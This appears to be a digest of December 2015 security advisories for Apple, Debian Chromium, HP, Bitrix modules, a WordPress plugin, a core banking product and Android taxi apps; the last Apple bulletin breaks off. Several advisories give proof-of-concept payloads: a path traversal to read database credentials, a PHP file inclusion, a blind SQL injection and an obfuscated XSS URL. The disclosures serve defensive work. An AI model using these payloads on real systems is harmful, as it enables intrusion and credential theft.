APPLE-SA-2015-12-08-4 watchOS 2.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-4 watchOS 2.1 watchOS 2.1 is now available and addresses the following: AppSandbox Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt Compression Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru CoreGraphics Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of malformed media files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7075 dyld Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A segment validation issue existed in dyld. This was addressed through improved environment sanitization. CVE-ID CVE-2015-7072 : Apple FontParser Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative GasGauge Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6979 : PanguTeam ImageIO Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue existed in ImageIO. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7053 : Apple IOHIDFamily Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-7111 : beist and ABH of BoB CVE-2015-7112 : Ian Beer of Google Project Zero IOKit SCSI Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference existed in the handling of a certain userclient type. This issue was addressed through improved validation. CVE-ID CVE-2015-7068 : Ian Beer of Google Project Zero Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-ID CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2015-7043 : Tarjei Mandt (@kernelpool) Kernel Available for: Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes Impact: A local user may be able to execute arbitrary code with kernel privileges Description: An issue existed in the parsing of mach messages. This issue was addressed through improved validation of mach messages. CVE-ID CVE-2015-7047 : Ian Beer of Google
[SECURITY] [DSA 3415-1] chromium-browser security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3415-1 secur...@debian.org https://www.debian.org/security/ Michael Gilbert December 09, 2015 https://www.debian.org/security/faq - - Package: chromium-browser CVE ID : CVE-2015-1302 CVE-2015-6764 CVE-2015-6765 CVE-2015-6766 CVE-2015-6767 CVE-2015-6768 CVE-2015-6769 CVE-2015-6770 CVE-2015-6771 CVE-2015-6772 CVE-2015-6773 CVE-2015-6774 CVE-2015-6775 CVE-2015-6776 CVE-2015-6777 CVE-2015-6778 CVE-2015-6779 CVE-2015-6780 CVE-2015-6781 CVE-2015-6782 CVE-2015-6784 CVE-2015-6785 CVE-2015-6786 Several vulnerabilities have been discovered in the chromium web browser. CVE-2015-1302 Rub Wu discovered an information leak in the pdfium library. CVE-2015-6764 Guang Gong discovered an out-of-bounds read issue in the v8 javascript library. CVE-2015-6765 A use-after-free issue was discovered in AppCache. CVE-2015-6766 A use-after-free issue was discovered in AppCache. CVE-2015-6767 A use-after-free issue was discovered in AppCache. CVE-2015-6768 Mariusz Mlynski discovered a way to bypass the Same Origin Policy. CVE-2015-6769 Mariusz Mlynski discovered a way to bypass the Same Origin Policy. CVE-2015-6770 Mariusz Mlynski discovered a way to bypass the Same Origin Policy. CVE-2015-6771 An out-of-bounds read issue was discovered in the v8 javascript library. CVE-2015-6772 Mariusz Mlynski discovered a way to bypass the Same Origin Policy. CVE-2015-6773 cloudfuzzer discovered an out-of-bounds read issue in the skia library. CVE-2015-6774 A use-after-free issue was found in extensions binding. CVE-2015-6775 Atte Kettunen discovered a type confusion issue in the pdfium library. CVE-2015-6776 Hanno Böck dicovered and out-of-bounds access issue in the openjpeg library, which is used by pdfium. CVE-2015-6777 Long Liu found a use-after-free issue. CVE-2015-6778 Karl Skomski found an out-of-bounds read issue in the pdfium library. CVE-2015-6779 Til Jasper Ullrich discovered that the pdfium library does not sanitize "chrome:" URLs. CVE-2015-6780 Khalil Zhani discovered a use-after-free issue. CVE-2015-6781 miaubiz discovered an integer overflow issue in the sfntly library. CVE-2015-6782 Luan Herrera discovered a URL spoofing issue. CVE-2015-6784 Inti De Ceukelaire discovered a way to inject HTML into serialized web pages. CVE-2015-6785 Michael Ficarra discovered a way to bypass the Content Security Policy. CVE-2015-6786 Michael Ficarra discovered another way to bypass the Content Security Policy. For the stable distribution (jessie), these problems have been fixed in version 47.0.2526.73-1~deb8u1. For the testing distribution (stretch), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 47.0.2526.73-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQQcBAEBCgAGBQJWaNtaAAoJELjWss0C1vRz6d8f/ixjSiBDXKjBnjtGs0dr2nRK ruz1uHJWHqSElOAc/qD100VJk/1q2vR4JU5XR1j5eBj03MZNI3SJnuNMHoTmr3wZ gj6BvhDBRiOEvgRTCnVazjNU5ep+8XOw7b2L8fhy+BliS4sOBH9l/HFbGsNm9exw 6xgxiy7aHkY1IqcncL/UmJrJcgGNrEDzvcijNCxM6sMrveSGYjLnhO4BiIu6ASHb zs6KtdYuyOnja3cL5Rq6Qq9svx4QumjULqAIN6/RLYzzYe6+ZWaF+i0V+0OYfL6P RttBW4OKYLbNezT9206ujsjoWvDKZJ6vZ1fYGcqNlI/CrU7IskVs1IcNkB8iRrhY AK8Q1KeEmFPaWCa+60hdQ0K1M6rGR+FVyA+gfE4bu1DK1DS1NXE6HQZOvihkxFMU yN9i2iX0pb+DpZMQmJf4nv78ASzw0V1V+x2p8+ccyIKEYqnP4mSFo/61TvuA6fJm 6D7TLWT8DpZ5Po0LaIAUzwwmDAgQi82rWDgL2c7ebX/HeIZZ9MnBuzSMitjR05sQ 4uLUl8MkVnP5azWCBNATUfDvNjzlNiKlwCnoRONfF0+tRBzUpWGYCA4jLGYMcgxc Kx3bdP6+r4HyfjebQ5M//FVj37MbLH1YwMofeO7muuIuwMwP27UgbTRPJqjuGypS MSHyyFkmaj/RvDoIgkM4BFyc9xzejhGMnDeg0qlFS4xocdkEGUKjr8c+VUhzMpAM T+3Kw4lEtTXy09ttZ4VP63OOelUGd2i32ir2PvvU+3QwjArjAuBsvBlrFwnkJWqC 5UUPQ+lA82NG3n0JYqHu5QJEUQVyhibbg3yzXxz0LitaJC77NoPJIxahz7RDxNCk Ox/imWUapkHZWO8ewcuHPgIf7OJarXOOn6cAaDH2J46WUdLTnP2ghOYwTm0xZuHh 78aSCEqnYVImepwXv9ndd0BR3S9etnOKmmouwFcsMiZd25ASOCN9zVUrfPki7CIz LZRO1s895cR4Wa9/Gx2rja1wJqUrdYA4APJZGbaU8dZBmnEfe1WFSMP4dfp8KdZQ iSzY6/339uzlE6Q/aWDvYBGTFS2+Gf3FxnlhAGdOT0TLRt8GvVIt2YjyGRET7UUh zHpxImL0bY/RrPOaRaUtEcZJrRMgLT7ZPIcIeqZgOKHn8+NRcg45JORuDQ3ibhba cqNZQsOZbNAsTF0D32T/BM1rdsu0BoK/Z8FFE/WbrvP+D43wU0m9jjRDNxv2ZQ9n ZELwH6kWxLAVapxJoe2CHmfFxB6rYnQJxsmDh8OLqzqBpcVxEkjlX/iRBP8cFf8O
MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow
Hi @ll, Today Apple fixed buffer overflow issue in LIBC/FTS (CVE-2015-7039). Patch available for: - OS X El Capitan v10.11 and v10.11.1 - iPhone 4s and later, - Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes - Apple TV (4th generation) Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: Multiple buffer overflows existed in the C standard library. These issues were addressed through improved bounds Conception and description of issue here: https://cxsecurity.com/issue/WLB-2015100149 Best Regards, Maksymilian Arciemowicz (http://cert.cx) https://cxsecurity.com - Independent Information
[CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 secunet Security Networks AG Security Advisory Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities 1. DETAILS - -- Product: SECURE DATA SPACE Vendor URL: www.ssp-europe.eu Type: Cross-site Scripting[CWE-79] Date found: 2015-09-30 Date published: 2015-12-09 CVSSv2 Score: 4,3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) CVE: CVE-2015-7706 2. AFFECTED VERSIONS - All product versions (Online, Dedicated, For Linux/Windows) in Web-Client v3.1.1-2 restApiVersion: 3.5.7-FINAL sdsServerVersion: 3.4.14-FINAL 3. INTRODUCTION - --- "The highly secure business solution for easy storage, synchronization, distribution and management of data - regardless of location or device" (from the vendor's homepage) 4. VULNERABILITY DETAILS - The Secure Data Share version v3.1.1-2 is vulnerable to multiple unauthenticated Non-Persistent Cross-Site Scripting vulnerabilities when user-supplied input is processed by the server.[0] #1 Proof-of-Concept: https://example.com/api/v3//public/shares/downloads/111"} #2 Proof-of-Concept(authType parameter): POST /api/v3/auth/login
[security bulletin] HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04918653 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04918653 Version: 1 HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-12-09 Last Updated: 2015-12-09 Potential Security Impact: Remote disclosure of information Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Insight Control server provisioning that could be exploited remotely resulting in information disclosure. References: CVE-2015-6858 PSRT102928 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server provisioning Prior to v7.5.0 RabbitMQ BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2015-6858(AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION Hewlett Packard Enterprise has provided HP Insight Control server provisioning version 7.5.0 to resolve this vulnerability: http://www.hp.com/go/insightupdates HISTORY Version:1 (rev.1) - 9 December 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hpe.com. Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-al...@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2015 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQEcBAEBAgAGBQJWaJqYAAoJEGIGBBYqRO9/3NQIAJ/viczjYCY6Ne0a8qJvECh4 ylz17l013bvEFUUeSVR1HxkMIZwEEOVi7G64HrS3wSGd/UUOkY1mM9N05bFkUbD4 E6pspSQBMoQQuhRQnwEtYALDvow1aGQEN7Kh2KHXZeEi2IN6vC+RzfFS5VNfKwq1 mL4slpMGVTIzkgJVvle3nFiHo84cPWy7dDUqG/l8Uiukc71Z8mhjzrdKRB0Jgg6X uFpAn+0vPwel2SjfRGQI4R8t4v+qlX144Xk0Yy0XhhZNXS3bpfkiS/GAXwKtNt/s KDpmPRG9WxVP0kxf8fQTbaza3UMwqeUgaxOl6VSPFxY9fFdOKzfdjXYxzI9yCgE= =ioKE -END PGP SIGNATURE-
Path Traversal via CSRF in bitrix.xscan Bitrix Module
Advisory ID: HTB23278 Product: bitrix.xscan Bitrix module Vendor: Bitrix Vulnerable Version(s): 1.0.3 and probably prior Tested Version: 1.0.3 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Vendor Patch: November 24, 2015 Public Disclosure: December 9, 2015 Vulnerability Type: Path Traversal [CWE-22] CVE Reference: CVE-2015-8357 Risk Level: Medium CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.xscan Bitrix module, intended to discover and neutralize malware on the website. The vulnerability can be exploited to change extension of arbitrary PHP files on the target system and gain access to potentially sensitive information, such as database credentials, or even make the whole website inaccessible. The vulnerability exists due to absence of filtration of directory traversal characters (e.g. "../") passed via "file" HTTP GET parameter to "/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker can upload a file with malicious contents, pass this file to vulnerable script along with name of the file to rename. As a result, the vulnerable script will change extension of the given file from ".php" to ".ph_”. These actions will make the web server treat this file as a text file and display its contents instead of executing it. To demonstrate the vulnerability follow the steps below: 1) Chose arbitrary image file and modify it by appending eval() PHP function at the end of the file. We need this, because the file will be renamed only if it contains potentially dangerous content. 2) Upload this file using standard CMS functionality, for example as an image for your profile. 3) Obtain the name of the image you have uploaded. You can do it using your profile. In our example the images had the following path: "/upload/main/77f/image.jpg". 4) Construct the exploit payload using path to the image and the file you want to view. As a demonstration we chose to view contents of "/bitrix/.settings.php" file, since it contains database credentials: file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php 5) Use the following PoC code to reproduce the vulnerability: http://[host]/admin/bitrix.xscan_worker.php?action=prison=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php;> As a result, the vulnerable script will rename "/bitrix/.settings.php" into "/bitrix/.settings.ph_", which makes it readable by anonymous users: http://[host]/bitrix/.settings.ph_ Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. Steps 1-4 do not require administrative or special privileges and can be performed by any user, who can register at the website or upload an image. --- Solution: Update to bitrix.xscan module 1.0.4 --- References: [1] High-Tech Bridge Advisory HTB23278 - https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in bitrix.xscan Bitrix Module [2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - Module for Bitrix CMS that can detect Trojans on your website. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
PHP File Inclusion in bitrix.mpbuilder Bitrix Module
Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Version(s): 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Vendor Patch: November 25, 2015 Public Disclosure: December 9, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8358 Risk Level: Critical CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website. Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. The vulnerability exists due to insufficient filtration of "work[]" HTTP POST parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system. A simple exploit below will include and execute "/tmp/file" file: http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; method="post" name="main"> In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious "NAME" value: http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; method="post" name="main"> --- Solution: Update to bitrix.mpbuilder module 1.0.12 --- References: [1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module [2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
WordPress Users Ultra Plugin [Blind SQL injection] - Update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 * Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection] * Discovery Date: 2015/10/19 * Public Disclosure Date: 2015/12/01 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://usersultra.com * Software Link: https://wordpress.org/plugins/users-ultra/ * Version: 1.5.50 * Tested on: WordPress 4.3.1 * Category: webapps Description One can perform an SQL injection attack simply by exploiting the following WP ajax actions: 1. `edit_video` 2. `delete_photo` 3. `delete_gallery` 4. `delete_video` 5. `reload_photos` 6. `edit_gallery` 7. `edit_gallery_confirm` 8. `edit_photo` 9. `edit_photo_confirm` 10. `edit_video_confirm` 11. `set_as_main_photo` 12. `sort_photo_list` 13. `sort_gallery_list` 14. `reload_videos` POST parameters that are exploitable in each action respectively: 1. `video_id` 2. `photo_id` 3. `gal_id` 4. `video_id` 5. `gal_id` 6. `gal_id` 7. `gal_id` 8. `photo_id` 9. `photo_id` 10. `video_id` 11. `photo_id`, `gal_id` 12. `order` 13. `order` 14. `video_id` In case #7 a user can also change the gallery name, description and visibility by setting POST parameters `gal_name`, `gal_desc` and `gal_visibility` respectively. In case #8 `photo_id` is first casted to integer and a query to DB is performed. If results are returned then for each result a new query is performed without casting the `photo_id` to integer. So if an attacker knows a valid video id then it can perform the attack in the second query. This achievable because ` In case #9 a user can also change the photo name, description, tags and category by setting POST parameters `photo_name`, `photo_desc`, `photo_tags` and `photo_category` respectively. In case #10 a user can also change the video name, unique id and type by setting POST parameters `video_name`, `video_unique_id` and `video_type` respectively. Because function wpdb::get_results() and wpdb::query() are in use here, only one SQL statement can be made per request. This holds severity of the attack low. In addition all actions are privileged so the user must have an active account in vulnerable website, in order to perform the attack. PoC Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=edit_video_id=1 and sleep(5) ` Timeline 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via contact form in his website 2015/11/13 - Vendor notified via support forums at wordpress.org 2015/11/14 - Vendor responded and received report through email 2015/12/08 - Vendor provided new version 1.5.63 which resolves issues Solution Upgrade to version 1.5.63 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) iQIcBAEBAgAGBQJWZ2ZhAAoJEBe10gGXVLphzFUP/3CkzkaF9sQgl3hZo2QaWzsu kq43dBtVDQZjBQp5Qs2JqFYO7yc9FWRSZyD38CrWWtCwqK8DlMFxZYoAqwt45lEx lYxiOUCO98BXeAUXy/DeS+gY2dgnt0FvC0SKpN59OS95Nn6EBaCcKCczavn46zxm rPGr7GzORO7wqObgL16Rew98hmVsf+nYwFNvMBfq7NQIZQzD065S7dQKt33PNjey u4/I3HFW7tKljVdait+LObfvLTA/TAxeFDRQhM5uRN2UGBBU5AWHwZK4JeayEaw4 i3MJPe6ZggXn3BMdrBzuySvMWuX8cEwMzJW9dKzwOz+97iZYiS5UFGH3PbT2VV0Y It/uFdnqn6Z+f7rLRQdYpHImivkRirX6YgJ9gbT7ZqTJwrF2cTGykl8qkcddkSwU Tt517YGXrw/8fgzRRH0/sRoK2JFq/V+pr6ksOEi/ppKdQrQaz+Kuy4lUglgN7NtC Vlyma9GQnkPl5IAbCT18dNv8p6PcR4zcU0bKZufW2bfnEoaXVsL1vjjZ9oz9xAwX q6i/4cGKsG7KwcSBqUNOw3SAXJjqBJhHQHrTw2TIb3bHLUh8/fGvCqQsRhfPUAf0 uAkfBQ5fXjtaKQcXif2LwjSgsaVhaiJY4Fp946mPn7E32jEswdcKrpaBA9WoPGgG OJG27/ImQ9GJuXQV/uFW =Fpqd -END PGP SIGNATURE-
XSS vulnerability in Intellect Core banking software - Polaris
[+] Credits: Mayank Sahu [+] Email: ms...@controlcase.com Vendor: Intellect Design Arena (Polaris) Product: === Intellect Core banking software (Armar module) Vulnerability Type: == Cross site scripting - XSS CVE Reference: == CVE-2015-6540 Vulnerability Details: == Application allows arbitrary client side JS code execution on victims who click our infected link. Session ID and data theft may follow as well as possibility to bypass CSRF protections, injection of iframes to establish communication channels etc. The vulnerability exist after login into application. XSS Exploit code(s): === http://Server-address:7001/AAL/LoginAfter.jsp?page=Logout.jsp%27|[window[%27location%27]%3D%27\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27 Disclosure Timeline: = Vendor Notification: September 21, 2015 December 09, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s): [+] GET Vulnerable Product: [+] Intellect Core banking solution (Armor) Vulnerable Parameter(s):[+] page [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by Mayank Sahu
Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge)
Original: http://securityresearch.shaftek.biz/2015/12/goarro-and-other-taxi-hailing-apps-did-not-use-ssl.html CERT Advisory: https://www.kb.cert.org/vuls/id/439016 Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge) Overview Arro and possibly over 100 other Android taxi hailing apps did not SSL to secure communications between the application and its servers. Background Arro is a taxi hailing service allowing users to hail yellow taxis in New York from their smartphones. The service also allows users to pay for their ride via the application while they are in a taxi. The underlying technology is a white branded version of an application called Taxi Hail, made by a company called Mobile Knowledge, in Ottawa, Canada, a subsidiary of Creative Mobile Technologies, LLC (CMT) of New York, NY. Both are providers of technology solutions for the taxi industry. At least 100 other white branded taxi applications run on the same platform as Arro, with a link to a non-exhaustive list appearing later in this document. Details While monitoring network traffic from an Android smartphone, we observed that most communications between the Arro Android application and servers was unencrypted and did not use SSL. Instead, regular HTTP calls were being used. Further investigation showed that the underlying application and servers were a white branded version of TaxiHail, developed by Mobile Knowledge. Information observed included: Username and passwords for the users of the application User profile including address and phone number Credentials for various APIs and payment gateways used by the application Latitude and longitude of the user requesting a taxi Last four digits and expiration date of the user's credit cards on file When adding a new credit card - full credit card information Payments were made via a separate gateway that uses SSL and were not at risk. However, adding credit cards would be done without SSL. A secondary minor issue was also discovered. The GoArro app created a text log on the SD Card of the device being tested. This log, located in "/TaxiHail/errorlog.txt" contained GPS locations for the user, which would accessible to applications on the same phone without location access. This issue has also been fixed. References Arro website: https://www.goarro.com/ CERT/CC ID: VU# 439016 CMT website: http://creativemobiletech.com/ List of white branded apps: https://play.google.com/store/search?q=com.apcurium.MK=apps=en TaxiHail website: http://www.mobile-knowledge.com/products/passenger-solutions/taxihail/ Credits Thank you to Garret Wasserman of CERT/CC for helping to communicate with the vendors. Timeline 2015-10-14: Arro notified 2015-10-14: Initial vendor response 2015-10-15: Followup communications to Arro, no response 2015-10-20: CERT/CC notified 2015-10-23: CERT/CC response 2015-11-06: Mobile Knowledge acknowledged the problem via CERT/CC 2015-11-30: Fix deployed by vendor 2015-12-01: Fix confirmed 2015-12-08: Public disclosure, coordinated with CERT/CC Version Information Version 3 Last updated on 2015-12-07
APPLE-SA-2015-12-08-1 iOS 9.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 APPLE-SA-2015-12-08-1 iOS 9.2 iOS 9.2 is now available and addresses the following: AppleMobileFileIntegrity Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An access control issue was addressed by preventing modification of access control structures. CVE-ID CVE-2015-7055 : Apple AppSandbox Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may maintain access to Contacts after having access revoked Description: An issue existed in the sandbox's handling of hard links. This issue was addressed through improved hardening of the app sandbox. CVE-ID CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi of TU Darmstadt CFNetwork HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may be able to bypass HSTS Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and Muneaki Nishimura (nishimunea) Compression Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An uninitialized memory access issue existed in zlib. This issue was addressed through improved memory initialization and additional validation of zlib streams. CVE-ID CVE-2015-7054 : j00ru CoreGraphics Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team CoreMedia Playback Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of malformed media files. These issues were addressed through improved memory handling. CVE-ID 